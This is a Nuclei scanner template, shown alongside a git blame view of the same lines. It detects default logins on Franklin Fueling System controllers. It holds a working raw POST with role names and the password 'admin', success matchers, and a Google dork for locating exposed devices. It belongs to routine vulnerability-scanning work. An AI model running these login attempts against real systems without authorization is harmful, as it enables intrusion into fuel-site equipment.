nuclei-templates/http/default-logins/franklin-fueling-default-lo...

id: franklin-fueling-default-login

info:
  name: Franklin Fueling System - Default Login
  author: r3Y3r53
  severity: high
  description: |
    A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39466
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:"relay_status.html"
  tags: default-login,franklin

http:
  - raw:
      - |
        POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>

    attack: pitchfork
    payloads:
      username:
        - roleAdmin
        - roleUser
        - roleGuest
      password:
        - admin
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "</TSA_RESPONSE_LIST>")'
          - 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
        condition: and

# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: franklin-fueling-default-login`

			`info:`
Update franklin-fueling-default-login.yaml 2023-10-17 18:01:21 +00:00			`name: Franklin Fueling System - Default Login`
templates added 2023-10-17 07:20:28 +00:00			`author: r3Y3r53`
			`severity: high`
			`description: \|`
			`A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.`
			`reference:`
			`- https://www.exploitalert.com/view-details.html?id=39466`
			`metadata:`
			`verified: true`
			`max-request: 1`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`google-query: inurl:"relay_status.html"`
templates added 2023-10-17 07:20:28 +00:00			`tags: default-login,franklin`

			`http:`
			`- raw:`
			`- \|`
			`POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/xml`
fixed errors 2023-10-17 08:16:05 +00:00
templates added 2023-10-17 07:20:28 +00:00			`<TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>`

			`attack: pitchfork`
			`payloads:`
			`username:`
			`- roleAdmin`
			`- roleUser`
			`- roleGuest`
			`password:`
			`- admin`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains(content_type, "text/xml")'`
Update franklin-fueling-default-login.yaml 2023-10-17 18:01:21 +00:00			`- 'contains(body, "</TSA_RESPONSE_LIST>")'`
templates added 2023-10-17 07:20:28 +00:00			`- 'contains(body, "roleAdmin") \|\| contains(body, "roleUser") \|\| contains(body, "roleGuest")'`
			`condition: and`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00
			`# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950`